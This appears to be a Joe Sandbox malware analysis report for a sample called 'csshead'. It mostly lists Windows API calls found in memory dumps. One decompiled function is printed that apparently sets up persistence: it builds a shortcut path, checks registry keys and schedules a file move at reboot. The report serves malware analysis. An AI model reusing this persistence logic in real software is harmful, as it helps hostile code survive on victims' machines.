    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B34
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 00413B48
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413B54
    Strings
    • WTL_CmdBar_InternalAutoPopupMsg, xrefs: 00413B43
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00413B98
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4
    Strings
    • WTL_CmdBar_InternalGetBarMsg, xrefs: 00413B93
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,004243CF,?,?,0042BFFB,000000FF,0000001E,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 004243A1
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004243B1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCapture.USER32 ref: 00413587
    • ClientToScreen.USER32(?,?), ref: 004135BE
    • GetWindowRect.USER32(?,?), ref: 004135E3
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?,?,?), ref: 00413659
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 00412881
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 004128B5
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,-00000001), ref: 004128E5
      • Part of subcall function 00412EB0: DeleteDC.GDI32(00000000), ref: 00412ED3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000409,00000000,00000000), ref: 0041FF4A
    • LoadStringA.USER32(00442B94,?,?,00000100), ref: 0041FFF4
    • SendMessageA.USER32(?,00000409,00000001,00000000), ref: 00420027
    • SendMessageA.USER32(?,00000401,000001FF,?), ref: 0042003C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpi.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpi.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpi.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpi.KERNEL32(?,Embedding), ref: 0041DAAA
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetClientRect.USER32(?,?), ref: 00411569
    • GetMenuItemCount.USER32(?), ref: 00411573
    • SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetClientRect.USER32(?,?), ref: 00411479
    • GetMenuItemCount.USER32(?), ref: 00411498
    • SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
    • SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00420A36
    • FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E), ref: 00420A57
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 004202C0: SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000EC), ref: 004202F4
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000EC), ref: 00420302
      • Part of subcall function 004202C0: GetWindowLongA.USER32(?,000000F0), ref: 00420311
      • Part of subcall function 004202C0: SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
      • Part of subcall function 004202C0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
      • Part of subcall function 004202C0: GetClientRect.USER32(?,?), ref: 00420378
    • GetWindowLongA.USER32(?,000000F0), ref: 00420696
    • GetWindowLongA.USER32(?,000000EC), ref: 004206A5
    • GetWindowLongA.USER32(?,000000F0), ref: 004206B0
    • AdjustWindowRectEx.USER32(?,00000000,?,00000001), ref: 004206B8
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SendMessageA.USER32(?,00000410,0000EB01,00000000), ref: 0041E77E
    • SendMessageA.USER32(?,00000423,00000000,00441340), ref: 0041E78E
    • GetClientRect.USER32(?,?), ref: 0041E7C5
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E7FD
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
    • SetTextColor.GDI32(00000000,?), ref: 00412A5B
    • DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
    • DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindowVisible.USER32(?), ref: 0041E81B
    • ShowWindow.USER32(?,00000001), ref: 0041E836
    • GetClientRect.USER32(?,?), ref: 0041E86B
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
      • Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
      • Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
      • Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
      • Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E8A3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 00425510
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __amsg_exit.LIBCMT ref: 00425530
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • InterlockedDecrement.KERNEL32(?), ref: 0042555D
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • InterlockedIncrement.KERNEL32(00441D00), ref: 00425588
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetLastError.KERNEL32(?,00000000,004251BD,00422AA1,?,?,00417F96,00000009), ref: 00425E76
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • SetLastError.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425EE0
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000), ref: 00425EB2
    • GetCurrentThreadId.KERNEL32 ref: 00425EC8
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetTopWindow.USER32 ref: 0041FC14
    • SendMessageA.USER32(00000000,?,?,?), ref: 0041FC38
    • GetTopWindow.USER32(00000000), ref: 0041FC43
    • GetWindow.USER32(00000000,00000002), ref: 0041FC65
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • IsWindow.USER32(?), ref: 00414100
    • IsWindow.USER32(?), ref: 00414119
    • SetFocus.USER32(?), ref: 00414123
    • SendMessageA.USER32 ref: 00414141
      • Part of subcall function 004128F0: SendMessageA.USER32(?,00000446,00100000,?), ref: 0041292D
      • Part of subcall function 004128F0: InvalidateRect.USER32(?,00000000,00000001), ref: 0041293B
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • TranslateAccelerator.USER32(?,?,?), ref: 0041E6F5
    • TranslateMDISysAccel.USER32(?,?), ref: 0041E704
    • SendMessageA.USER32(?,00000229,00000000,00000000), ref: 0041E72B
    • SendMessageA.USER32(00000000,0000037F,00000000,?), ref: 0041E73A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetFocus.USER32 ref: 0041720A
    • GetFocus.USER32 ref: 00417220
    • SetFocus.USER32(?), ref: 0041722C
    • SendMessageA.USER32(?,00000419,?,00000000), ref: 00417241
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416F08
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
      • Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
      • Part of subcall function 00416ED0: GetSubMenu.USER32(?,?), ref: 00416F7D
      • Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416FB0
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
      • Part of subcall function 00416ED0: GetFocus.USER32 ref: 0041702B
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
      • Part of subcall function 00416ED0: PtInRect.USER32(?,?,?), ref: 00417098
      • Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
      • Part of subcall function 00416ED0: RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
      • Part of subcall function 00416ED0: RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalAutoPopupMsg), ref: 004170EF
      • Part of subcall function 00416ED0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00442B50,?,00000000), ref: 0041711C
      • Part of subcall function 00416ED0: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
      • Part of subcall function 00416ED0: SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • TlsGetValue.KERNEL32(?,?,00423C05,00000000), ref: 00426055
    • TlsGetValue.KERNEL32(?,?,00423C05,00000000), ref: 00426067
    • RtlDecodePointer.NTDLL(00000000), ref: 0042607D
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
    • TlsSetValue.KERNEL32(00442050,00000000,?,00423C05,00000000), ref: 0042609A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00419220: GetMenuItemCount.USER32(?), ref: 0041922F
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
      • Part of subcall function 00419220: lstrcmp.KERNEL32(?,&Window), ref: 004192E4
      • Part of subcall function 00419220: GetSubMenu.USER32(?,?), ref: 00419317
    • SendMessageA.USER32(?,00000230,?,00000000), ref: 004193B4
    • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004193C3
    • GetParent.USER32(?), ref: 004193C9
    • DrawMenuBar.USER32(00000000), ref: 004193D0
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00419220: GetMenuItemCount.USER32(?), ref: 0041922F
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,00000000,00000000,00000400), ref: 00419258
      • Part of subcall function 00419220: GetMenuStringA.USER32(?,-00000002,?,00000001,00000400), ref: 004192C6
      • Part of subcall function 00419220: lstrcmp.KERNEL32(?,&Window), ref: 004192E4
      • Part of subcall function 00419220: GetSubMenu.USER32(?,?), ref: 00419317
    • SendMessageA.USER32(?,00000230,?,00000000), ref: 00419364
    • SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00419373
    • GetParent.USER32(?), ref: 00419379
    • DrawMenuBar.USER32(00000000), ref: 00419380
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetParent.USER32(?), ref: 0041FB2D
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041FB3A
    • GetParent.USER32(00000000), ref: 0041FB41
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041FB48
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 93%
    			E004076A0(int __eax, void* __ebx) {
    				int _v8;
    				char* _v12;
    				char* _v16;
    				char _v273;
    				char _v530;
    				void* __ebp;
    				int _t38;
    				signed int _t46;
    				signed int _t50;
    				signed int _t57;
    				intOrPtr _t92;
    				long _t97;
    				long _t99;
    				long _t100;
    				intOrPtr _t102;
    				void* _t104;
    				void* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    
    				_t38 = __eax;
    				_v8 = __eax;
    				if( *0x40b514 > 0 &&  *0x40b510 != 0) {
    					E00401308( &_v530, 0x40b518);
    					 *((char*)(_t111 + E004012DC(0x40b518) - 0x212)) = 0;
    					E0040133C( &_v530, ".lnk");
    					_t113 = _t112 + 8;
    					_t96 =  &_v530;
    					_t102 =  *0x40a0ac; // 0x401c58
    					_t46 = E00403FC8(0x40b518, __ebx,  &_v530, _t102);
    					asm("sbb eax, eax");
    					if( ~( ~_t46) == 0) {
    						E00401308( &_v530, 0x4078ec);
    						E0040133C( &_v530, 0x40b518);
    						E0040133C( &_v530, 0x4078f0);
    						_t92 =  *0x40a0ac; // 0x401c58
    						E0040133C( &_v530, _t92);
    						_t113 = _t113 + 0x18;
    					}
    					if( *0x40a034 == 0) {
    						_t50 = E00404968(0x80000001, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t50);
    						if(_t38 != 0 &&  *0x40b514 > 0 &&  *0x40b510 != 0) {
    							_t97 =  *0x40b514; // 0x0
    							_t104 =  *0x40b510; // 0x0
    							E0040485C(0x40b518, _t97, _t104);
    							return E0040763C(0x40b518);
    						}
    					} else {
    						_t57 = E00404968(0x80000002, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t57);
    						if(_t38 != 0) {
    							if(_v8 != 0) {
    								_t100 =  *0x40b514; // 0x0
    								_t109 =  *0x40b510; // 0x0
    								E0040485C(0x40b518, _t100, _t109);
    								return E0040763C(0x40b518);
    							}
    							E00401308( &_v273, 0x40b518);
    							_v12 =  &_v273;
    							_v16 = 0;
    							while( *_v12 != 0) {
    								if( *_v12 == 0x5c) {
    									_v16 = _v12;
    								}
    								_v12 = _v12 + 1;
    							}
    							if(_v16 == 0) {
    								_v16 =  &_v273;
    							} else {
    								_v16 = _v16 + 1;
    							}
    							 *_v16 = 0;
    							_v12 = E00403B80(9, 0x19, 0x14);
    							E0040133C(_v16, _v12);
    							E00401440(_v12);
    							E0040133C(_v16, ".txt");
    							_t38 = MoveFileExA( &_v273, 0x40b518, 4);
    							if( *0x40b514 > 0 &&  *0x40b510 != 0) {
    								_t99 =  *0x40b514; // 0x0
    								_t108 =  *0x40b510; // 0x0
    								E0040485C( &_v273, _t99, _t108);
    								return E0040763C( &_v273);
    							}
    						}
    					}
    				}
    				return _t38;
    			}
    APIs
      • Part of subcall function 00403FC8: CoInitialize.OLE32(00000000), ref: 00404001
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00404089
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 004040A7
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • MoveFileExA.KERNEL32(?,0040B518,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00407857
      • Part of subcall function 00404968: SHGetValueA.SHLWAPI(?,00401DAC,?,00000001,00000000,?), ref: 004049B1
      • Part of subcall function 00404968: RegOpenKeyExA.ADVAPI32(?,00401DAC,00000000,000F003F,?), ref: 004049D0
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 0040763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
      • Part of subcall function 0040763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
      • Part of subcall function 0040763C: CloseHandle.KERNEL32(000000FF), ref: 0040768A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • _strlen.LIBCMT ref: 0042CB10
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
      • Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00428185: __fltout2.LIBCMT ref: 004281B4
    • __fltout2.LIBCMT ref: 004287D1
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042885E
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __fltout2.LIBCMT ref: 004281B4
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __fltout2.LIBCMT ref: 00428710
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042878F
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
